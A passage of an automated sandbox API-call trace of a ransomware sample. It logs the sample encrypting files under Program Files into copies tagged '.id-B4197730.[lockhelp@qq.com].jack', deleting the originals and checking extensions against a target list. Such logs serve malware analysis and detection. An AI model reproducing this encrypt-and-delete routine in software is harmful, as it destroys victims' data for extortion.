liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.799] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.800] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\desktop.ini.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0199.800] GetLastError () returned 0x0 [0199.800] ReadFile (in: hFile=0x404, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0xae, lpOverlapped=0x0) returned 1 [0199.800] WriteFile (in: hFile=0x41c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xb0, lpOverlapped=0x0) returned 1 [0199.801] ReadFile (in: hFile=0x404, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.801] WriteFile (in: hFile=0x41c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xea, lpOverlapped=0x0) returned 1 [0199.801] SetEndOfFile (hFile=0x41c) returned 1 [0199.802] CloseHandle (hObject=0x41c) returned 1 [0199.805] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.805] SetEndOfFile (hFile=0x404) returned 1 [0199.806] CloseHandle (hObject=0x404) returned 1 [0199.806] SetFileAttributesW (lpFileName="C:\\Program Files\\desktop.ini.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x26) returned 1 [0199.807] DeleteFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini")) returned 1 [0199.807] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0199.807] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0199.807] lstrlenW (lpString=".doc") returned 4 [0199.807] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0199.807] lstrlenW (lpString=".docx") returned 5 [0199.807] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0199.807] lstrlenW (lpString=".pdf") returned 4 [0199.807] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0199.807] lstrlenW (lpString=".xls") returned 4 [0199.808] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0199.808] lstrlenW (lpString=".xlsx") returned 5 [0199.808] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0199.808] lstrlenW (lpString=".ppt") returned 4 [0199.808] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0199.808] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0199.808] lstrlenW (lpString=".zip") returned 4 [0199.808] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0199.808] lstrlenW (lpString=".rar") returned 4 [0199.808] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0199.808] lstrlenW (lpString=".bz2") returned 4 [0199.808] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0199.808] lstrlenW (lpString=".7z") returned 3 [0199.808] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0199.808] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0199.808] lstrlenW (lpString=".dbf") returned 4 [0199.808] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0199.808] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0199.808] lstrlenW (lpString=".1cd") returned 4 [0199.808] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0199.808] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0199.808] lstrlenW (lpString=".jpg") returned 4 [0199.808] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0199.808] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0199.808] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0199.809] lstrlenW (lpString=".doc") returned 4 [0199.809] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0199.809] lstrlenW (lpString=".docx") returned 5 [0199.809] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0199.809] lstrlenW (lpString=".pdf") returned 4 [0199.809] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0199.809] lstrlenW (lpString=".xls") returned 4 [0199.809] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0199.809] lstrlenW (lpString=".xlsx") returned 5 [0199.809] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0199.809] lstrlenW (lpString=".ppt") returned 4 [0199.809] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0199.809] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0199.809] lstrlenW (lpString=".zip") returned 4 [0199.809] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0199.809] lstrlenW (lpString=".rar") returned 4 [0199.809] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0199.809] lstrlenW (lpString=".bz2") returned 4 [0199.809] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0199.809] lstrlenW (lpString=".7z") returned 3 [0199.809] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0199.810] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0199.810] lstrlenW (lpString=".dbf") returned 4 [0199.810] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0199.810] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0199.810] lstrlenW (lpString=".1cd") returned 4 [0199.810] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0199.810] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0199.810] lstrlenW (lpString=".jpg") returned 4 [0199.810] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0199.810] lstrcmpiW (lpString1=".txt", lpString2=".jack") returned 1 [0199.810] lstrlenW (lpString="Xusage.txt") returned 10 [0199.810] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0199.810] GetFileSizeEx (in: hFile=0x404, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=1423) returned 1 [0199.810] CloseHandle (hObject=0x404) returned 1 [0199.811] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt")) returned 0x20 [0199.811] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.811] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0199.811] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.811] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.811] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0199.812] GetLastError () returned 0x0 [0199.812] ReadFile (in: hFile=0x404, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x58f, lpOverlapped=0x0) returned 1 [0199.870] WriteFile (in: hFile=0x41c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x590, lpOverlapped=0x0) returned 1 [0199.871] ReadFile (in: hFile=0x404, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.871] WriteFile (in: hFile=0x41c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xe8, lpOverlapped=0x0) returned 1 [0199.872] SetEndOfFile (hFile=0x41c) returned 1 [0199.872] CloseHandle (hObject=0x41c) returned 1 [0199.873] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.873] SetEndOfFile (hFile=0x404) returned 1 [0199.874] CloseHandle (hObject=0x404) returned 1 [0199.874] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0199.874] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt")) returned 1 [0199.875] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0199.875] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0199.875] lstrlenW (lpString=".doc") returned 4 [0199.875] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0199.875] lstrlenW (lpString=".docx") returned 5 [0199.875] lstrcmpiW (lpString1=".docx", lpString2="e.txt") returned -1 [0199.875] lstrlenW (lpString=".pdf") returned 4 [0199.875] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0199.875] lstrlenW (lpString=".xls") returned 4 [0199.875] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0199.875] lstrlenW (lpString=".xlsx") returned 5 [0199.875] lstrcmpiW (lpString1=".xlsx", lpString2="e.txt") returned -1 [0199.875] lstrlenW (lpString=".ppt") returned 4 [0199.875] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0199.875] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0199.875] lstrlenW (lpString=".zip") returned 4 [0199.875] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0199.875] lstrlenW (lpString=".rar") returned 4 [0199.875] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0199.875] lstrlenW (lpString=".bz2") returned 4 [0199.875] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0199.875] lstrlenW (lpString=".7z") returned 3 [0199.875] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0199.875] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0199.876] lstrlenW (lpString=".dbf") returned 4 [0199.876] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0199.876] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0199.876] lstrlenW (lpString=".1cd") returned 4 [0199.876] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0199.876] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0199.876] lstrlenW (lpString=".jpg") returned 4 [0199.876] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0199.876] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0199.876] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0199.876] lstrlenW (lpString=".doc") returned 4 [0199.876] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0199.876] lstrlenW (lpString=".docx") returned 5 [0199.876] lstrcmpiW (lpString1=".docx", lpString2="e.txt") returned -1 [0199.876] lstrlenW (lpString=".pdf") returned 4 [0199.876] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0199.876] lstrlenW (lpString=".xls") returned 4 [0199.876] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0199.876] lstrlenW (lpString=".xlsx") returned 5 [0199.876] lstrcmpiW (lpString1=".xlsx", lpString2="e.txt") returned -1 [0199.876] lstrlenW (lpString=".ppt") returned 4 [0199.876] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0199.876] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0199.876] lstrlenW (lpString=".zip") returned 4 [0199.876] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0199.876] lstrlenW (lpString=".rar") returned 4 [0199.877] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0199.877] lstrlenW (lpString=".bz2") returned 4 [0199.877] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0199.877] lstrlenW (lpString=".7z") returned 3 [0199.877] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0199.877] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0199.877] lstrlenW (lpString=".dbf") returned 4 [0199.877] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0199.877] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0199.877] lstrlenW (lpString=".1cd") returned 4 [0199.877] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0199.877] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0199.877] lstrlenW (lpString=".jpg") returned 4 [0199.877] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0199.877] lstrcmpiW (lpString1=".gif", lpString2=".jack") returned -1 [0199.877] lstrlenW (lpString="splash_11-lic.gif") returned 17 [0199.877] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0199.940] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=7805) returned 1 [0199.940] CloseHandle (hObject=0x3ec) returned 1 [0199.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif")) returned 0x20 [0199.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.940] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0199.941] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.941] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.941] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0199.941] GetLastError () returned 0x0 [0199.941] ReadFile (in: hFile=0x3ec, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x1e7d, lpOverlapped=0x0) returned 1 [0200.176] WriteFile (in: hFile=0x424, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x1e80, lpOverlapped=0x0) returned 1 [0200.177] ReadFile (in: hFile=0x3ec, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0200.177] WriteFile (in: hFile=0x424, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xf6, lpOverlapped=0x0) returned 1 [0200.177] SetEndOfFile (hFile=0x424) returned 1 [0200.177] CloseHandle (hObject=0x424) returned 1 [0200.180] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.180] SetEndOfFile (hFile=0x3ec) returned 1 [0200.181] CloseHandle (hObject=0x3ec) returned 1 [0200.181] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0200.181] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif")) returned 1 [0200.182] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0200.182] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0200.182] lstrlenW (lpString=".doc") returned 4 [0200.182] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0200.182] lstrlenW (lpString=".docx") returned 5 [0200.182] lstrcmpiW (lpString1=".docx", lpString2="c.gif") returned -1 [0200.182] lstrlenW (lpString=".pdf") returned 4 [0200.182] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0200.182] lstrlenW (lpString=".xls") returned 4 [0200.182] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0200.182] lstrlenW (lpString=".xlsx") returned 5 [0200.182] lstrcmpiW (lpString1=".xlsx", lpString2="c.gif") returned -1 [0200.182] lstrlenW (lpString=".ppt") returned 4 [0200.182] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0200.182] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0200.182] lstrlenW (lpString=".zip") returned 4 [0200.182] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0200.182] lstrlenW (lpString=".rar") returned 4 [0200.182] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0200.182] lstrlenW (lpString=".bz2") returned 4 [0200.182] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0200.182] lstrlenW (lpString=".7z") returned 3 [0200.182] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0200.182] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0200.182] lstrlenW (lpString=".dbf") returned 4 [0200.182] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0200.182] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0200.183] lstrlenW (lpString=".1cd") returned 4 [0200.183] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0200.183] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0200.183] lstrlenW (lpString=".jpg") returned 4 [0200.183] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0200.183] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0200.183] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0200.183] lstrlenW (lpString=".doc") returned 4 [0200.183] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0200.183] lstrlenW (lpString=".docx") returned 5 [0200.183] lstrcmpiW (lpString1=".docx", lpString2="c.gif") returned -1 [0200.183] lstrlenW (lpString=".pdf") returned 4 [0200.183] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0200.183] lstrlenW (lpString=".xls") returned 4 [0200.183] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0200.183] lstrlenW (lpString=".xlsx") returned 5 [0200.183] lstrcmpiW (lpString1=".xlsx", lpString2="c.gif") returned -1 [0200.183] lstrlenW (lpString=".ppt") returned 4 [0200.183] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0200.183] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0200.183] lstrlenW (lpString=".zip") returned 4 [0200.183] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0200.183] lstrlenW (lpString=".rar") returned 4 [0200.183] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0200.183] lstrlenW (lpString=".bz2") returned 4 [0200.183] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0200.183] lstrlenW (lpString=".7z") returned 3 [0200.183] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0200.183] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0200.183] lstrlenW (lpString=".dbf") returned 4 [0200.184] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0200.184] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0200.184] lstrlenW (lpString=".1cd") returned 4 [0200.184] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0200.184] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0200.184] lstrlenW (lpString=".jpg") returned 4 [0200.184] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0200.184] lstrcmpiW (lpString1=".gif", lpString2=".jack") returned -1 [0200.184] lstrlenW (lpString="splash_11@2x-lic.gif") returned 20 [0200.184] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0200.184] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=12250) returned 1 [0200.184] CloseHandle (hObject=0x3ec) returned 1 [0200.184] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif")) returned 0x20 [0200.184] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0200.185] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0200.185] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.185] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.185] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0200.185] GetLastError () returned 0x0 [0200.185] ReadFile (in: hFile=0x3ec, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x2fda, lpOverlapped=0x0) returned 1 [0201.313] WriteFile (in: hFile=0x424, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x2fe0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x2fe0, lpOverlapped=0x0) returned 1 [0201.315] ReadFile (in: hFile=0x3ec, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0201.315] WriteFile (in: hFile=0x424, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, 